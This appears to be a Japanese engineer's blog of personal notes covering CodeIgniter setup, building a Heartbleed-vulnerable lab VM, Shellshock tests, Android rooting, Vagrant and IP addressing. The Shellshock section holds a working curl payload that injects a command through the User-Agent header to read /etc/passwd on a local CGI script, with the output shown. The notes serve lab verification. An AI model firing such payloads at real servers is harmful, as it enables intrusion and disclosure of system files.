とあるエンジニアの備忘録

SE・コンサルタントの備忘録

CodeIgniter のインストール

サーバー構築

 

 

 

 

CodeIgniter 

http://www.ci-guide.info/

http://codeigniter.jp/user_guide_ja/toc.html

http://codeigniter.jp/user_guide_ja/installation/index.html

download

http://ellislab.com/codeigniter/user-guide/installation/downloads.html

 

htaccess の設定

RewriteEngine on

RewriteCond $1 !^(index\.php|images|javascripts|stylesheets|robots\.txt|favicon\.ico)

RewriteRule ^(.*)$ /index.php/$1 [L]

RewriteEngine onRewriteCond $1 !^(index\.php|images|javascripts|stylesheets|robots\.txt|favicon\.ico)

RewriteRule ^(.*)$ index.php?/$1 [L]

ーーーーーーーーーーーーーーーー

 

ll /var/www/dev/webapp/application/config/

 

 

 

 

 

 

Vagrant作成したVMにHeartBleed脆弱性をセット

脆弱性

vagrant で作成したVMに HeartBleed をset

1.VMsshログイン

vagrant ssh

2.作業用フォルダ作成&heartbox DL

mkdir work
cd work
wget wget https://github.com/diracdeltas/heartbox/archive/master.zip

3.解凍

sudo apt-get -y install  unzip
unzip master.zip

4.apache2.4 install

sudo apt-get -y install apache2
apache2 -v

5.heartboxの各種apacheファイル&認証鍵を配置

 sudo cp heartbox-master/conf/*.pem  /etc/ssl/cert/
 sudo cp heartbox-master/conf/httpd.conf  /etc/apache2/sites-available/
 sudo cp heartbox-master/conf/httpd-ssl.conf  /etc/apache2/sites-available/

6.現在有効なサイトの設定ファイルを確認

 ll /etc/apache2/sites-enabled/

以下のみだとわかるので、変更

000-default.conf -> ../sites-available/000-default.conf

7.sslを有効にする
http://smokycat.info/ubuntu/440

sudo a2ensite httpd-ssl.conf
sudo a2enmod ssl
sudo /etc/init.d/apache2 restart

shell shock 検証1

脆弱性

検証環境

OS:ubuntu 12.04

事前準備

手順

1.脆弱性検証コマンド

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

2.結果

vulnerable
this is a test

参考:
第4回 わずか1週間程度でBashが大幅な進化を遂げた ~Shellshock大暴れ~:インフラセキュリティの処方箋|gihyo.jp … 技術評論社

HTTP経由での実行

1. cgi作成

#!/bin/bash

echo 'Content-Type:text/html
<html>
<head>
<title>Hello World!</title>
</head>
<body>Hello World!!!</body>
</html>

2.検証コマンド

curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/test.cgi

3.結果確認

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
                ・
                ・

参考:Vagrantですぐに体験するbashのShellShock脆弱性の恐さ - Qiita

参考

Android root化 備忘

スマホ

環境

Android

  • XPeria AX SO-01e
  • OS ver : 9.1.C.1.186

PC

(ゲスト)OS: Windows 8.1

手順

1.adbコマンド実行環境を設定

参照:Windows 8.1でadbコマンドを使えるようにする簡単な方法を紹介


 android実行環境を設定するため、jdkをインストール

1-1.jdk をインストール
1-2.android DL : Android Studio

※ 画面の下のほうにSDK Tools Only のzipがあるが、platform-toolsが入っていないためこちらを選ぶ

1-3. システム環境変数

Windowsマイコンピューター 右クリ >プロパティ > 設定の変更 > 詳細設定tab > 環境変数 > TEMP > path > 編集
以下を追加

[展開したパッケージ¥toolのフルpath];[展開したパッケージ¥platform-toolsのフルpath]
1-4. パス確認

コマンドプロンプトで以下 コマンド入力

path

path :追加したpath が出力される
確認したらマシンreboot

2. adbドライバをインストール設定

android をPCに接続し、Sony PC Companionをインストール
※USBでのPC接続では、ケーブルによって充電しかできないものがある

2-1 .PCにADB Inter FaceDriver をインストール

PCに接続するとスマホ画面に「Sony PC Companionをインストールしますか」と表示されるので「YES」

2-2 .PC側『デバイスとドライブ』に 【Sony PC Software】が表示されるので、クリックし実行

※もしくは『ドライバをインストールしています』と表示され自動実行
インストール完了すると、自動的に起動する。起動確認後に、マシンリブート。
参照:http://www.teradas.net/archives/9931/

2-3. Windowsの『ドライバー署名の強制』を無効化にする
「電源オプション」をクリック > Shift + 再起動をクリック
 > [トラブルシューティング]  >[詳細オプション] >[Windowsのスタートアップ設定] >[再起動] 
起動後、「7」を押して「ドライバー署名の強制を無効にする」

Windows起動後、デバイスマネージャから「Sony sa0106」 > [ADB Inter FaceDriver]を確認

2-4. コマンドプロンプトでadbが実行できることを確認する

参照:

3. tft をDL

SO-01E 9.1.C.1.103,186 のFTFを準備
参照:Xperia FTF

4.Flashtool インストール

参照:【XPERIA】Flashtoolの使い方 - NAVER まとめ
※インストール項目だけでなく、次ページ以降の使い方も参考になる

4-1.Flash tool用driverインストール

 ※これがないとrootKit実行の前にflashができない

flash tool インストール・使い方・注意点の参照:

5.スマホのkernelのみflash(9.1.C.1.103)

 flash toolの使い方は手順4のリンク参照
 ※flash前に端末は電源OFF
 ※USB認識は音量小しながら再接続

6. rootkit DL

DL:キューブ実験室: 【Xperia】各機種ワンクリックroot取得【NX/acro HD/GX/SX ~ Z2/A2 等】

7.rootKit実行

rootKitを解凍して、install.bat実行
正常終了したら、USBから外して端末起動「SuperSU」が入っていることを確認

8.スマホのkernelのみflash(9.1.C.1.186)

手順5と同じ
完了したらroot化成功

参考

Vagrant と VirtualBox 備忘

サーバー構築

手順

1.VirtualBox をDL&インストール

2.Vagrant をDL&インストール

 インストール確認
 vagrant  --version

3.VM 用フォルダ作成

 mkdir  test 
 cd test

4.VagrantFile作成

でVagrantFileを作成
  initの引数にロードするVagrantFileを指定できる(指定しない場合は自分で内容を設定することになる)

 vagrant init ubuntu/trusty64

Getting Started - Vagrant Documentation
仮想環境構築ツール「Vagrant」で開発環境を仮想マシン上に自動作成する 2ページ | OSDN Magazine
Discover Vagrant Boxes | Atlas by HashiCorp

5.VM起動

 vagrant up

エラーなければOK. UIなしで起動している状態。VirtualBoxVM作成されていること&起動していることを確認できる
その他の起動&停止

 vagrant halt
 vagrant suspend
 vagrant reload

6.VM接続&切断

 vagrant ssh
 Ctr + D

Up and SSH - Getting Started - Vagrant Documentation

7.VMネットワーク設定

ホストだけでなく外部OSからも接続できるようにする。(IPふる時はマスクを考慮する)
VagrantとDockerについて名前しか知らなかったので試した - Qiita

Vagrantfile編集
  config.vm.network "public_network", ip: "192.168.179.10", :netmask => "255.255.255.0", :bridge => "en0: Wi-Fi (AirPort)"
リロード
 vagrant reload

接続確認はping

参考

IPアドレス割り当て 備忘録

ネットワーク インフラ

IPアドレス

IP アドレス
IPアドレスは32bit(8bit4つ)で表現される。
xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxx
↑左から『ネットワーク・アドレス』と『ホスト・アドレス』にわけ、ネットワークの分類とネットワーク内ホストを一度に表現している

ネットマスク(サブネットマスク

ネットマスク IPアドレスからネットワークアドレスを抽出するための値
IPアドレスと同じ32bitで表現され、ネットワークアドレスとみなす部分はすべて1として表す。これはAND演算を行うためである
抽出方法 AND演算によりIPアドレスからネットワークアドレスを抽出
(255.255.255.0の場合)
IPアドレス :11000000.10101000.00000001.10000000
ネットマスク:11111111.11111111.11111111.00000000
AND演算は共に1の場合のみ1として返すため、足し合わせると左側のマスク部分のみが抽出される

一覧

名前 説明
ネットワークアドレス LANなどで繋がったネットワーク全体を表すアドレス
ホスト部分は全て0bitで表す		 192.168.10.0(ネットワークアドレスは192.168.10)
172.16.0.0 (ネットワークアドレス)
ブロードキャストアドレス ネットワークに属するホスト全てを指定する際のアドレス
ホスト部分は全て1bitで表す		 192.168.10.255
255 = 1111(2bit表記)
ループバックアドレス 127.0.0.1のこと
自分自身を表す		 127.0.0.1 (ホスト名:localhost)
グローバルアドレス インターネットで割り当てられたアドレス いろいろ
プライベートアドレス ネットワーク内で割り当てられたアドレス 192.168.10.20

サブネットマスク

アドレスの上位何bitがネットワークアドレスであるかを定義する32bit数値
アドレスの後に/をつけて表す

ex 192.160.10.255/24 上位24bitがネットワークアドレス

参考


ハッカーの学校

ハッカーの学校